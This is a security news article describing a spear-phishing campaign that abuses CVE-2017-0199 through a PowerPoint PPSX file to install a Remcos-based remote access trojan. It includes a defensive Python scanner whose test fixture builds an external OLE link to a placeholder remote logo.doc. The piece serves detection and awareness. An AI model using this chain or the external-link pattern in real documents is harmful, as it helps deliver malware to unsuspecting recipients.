How Just Opening a Malicious PowerPoint File Could Compromise Your PC

A while back we detailed how opening a simple MS Word file could compromise your PC through a basic vulnerability in Microsoft Office.

The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface, for which a patch was released in April this year. Yet threat actors continue to abuse the flaw through various methods.

Security researchers have spotted a new malware campaign that leverages the same exploit, but for the first time it is hidden behind a specially crafted PowerPoint (PPSX) presentation file.

According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack relies on a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider, and mainly targets companies involved in the electronics manufacturing industry.

Researchers believe the attack uses a sender address disguised to look like a legitimate email sent by a sales and billing department.

Here's How the Attack Works:

The complete attack scenario is described below:

Step 1: The attack starts with an email that carries a malicious PowerPoint (PPSX) file as an attachment, pretending to be shipping information about an order request.

Step 2: When opened, the PPSX file calls an XML file embedded in it to download a "logo.doc" file from a remote location and runs it via the PowerPoint Show animations feature.

Step 3: The malformed logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system.

Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which, once installed, allows attackers to control infected computers remotely from its command-and-control server.
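The delivery step above hinges on a slide relationship that points at an OLE object hosted remotely instead of a part inside the presentation. The following defender-side scanner is an added example, not code from the article or from Trend Micro: it unpacks a PPSX (an OPC zip), reads each slide's `.rels` file and flags `oleObject` relationships marked `TargetMode="External"` with an http(s) target. The sample presentations and the URL are constructed placeholders, and the file layout assumes the standard Office Open XML part names.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace and the relationship type Office uses for OLE objects.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL_TYPE = OFFICE_REL + "oleObject"
REMOTE_URL = re.compile(r"^https?://", re.IGNORECASE)


def find_external_ole_links(ppsx_bytes):
    """Return (rels_part, target) pairs for OLE relationships pointing at a remote URL.

    Legitimately embedded objects omit TargetMode (or set it to Internal) and
    reference a part inside the zip; an oleObject relationship marked External
    with an http(s) target is the 'fetch a remote .doc and launch it' pattern.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("ppt/slides/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                is_ole = rel.get("Type") == OLE_REL_TYPE
                is_external = rel.get("TargetMode", "Internal").lower() == "external"
                target = rel.get("Target", "")
                if is_ole and is_external and REMOTE_URL.match(target):
                    hits.append((name, target))
    return hits


def build_sample_ppsx(extra_rel_xml):
    """Constructed minimal PPSX-like zip holding only the parts the scanner reads."""
    rels = ('<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sslideLayout" '
            'Target="../slideLayouts/slideLayout1.xml"/>%s</Relationships>'
            % (REL_NS, OFFICE_REL, extra_rel_xml))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/slide1.xml", "<sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


# Constructed fixtures: an ordinary embedded object vs. one fetched over HTTP.
# The URL is a placeholder, not an indicator taken from the campaign.
BENIGN_PPSX = build_sample_ppsx(
    '<Relationship Id="rId2" Type="%s" Target="../embeddings/oleObject1.bin"/>' % OLE_REL_TYPE)
SUSPICIOUS_PPSX = build_sample_ppsx(
    '<Relationship Id="rId2" Type="%s" Target="http://PLACEHOLDER.example/logo.doc" '
    'TargetMode="External"/>' % OLE_REL_TYPE)
```

Running `find_external_ole_links` over a real attachment at the mail gateway gives a cheap triage signal that does not depend on RTF-specific signatures.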

Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world, with capabilities such as a download-and-execute command, a keylogger, a screen logger, and recorders for both webcam and microphone.

Since the exploit has so far been used to deliver infected Rich Text Format (.RTF) documents, most detection methods for CVE-2017-0199 focus on the RTF. Therefore, the use of PPSX files allows attackers to evade antivirus detection as well.

The simplest way to protect yourself from this attack is to download and apply the patches released by Microsoft in April that address the CVE-2017-0199 vulnerability.
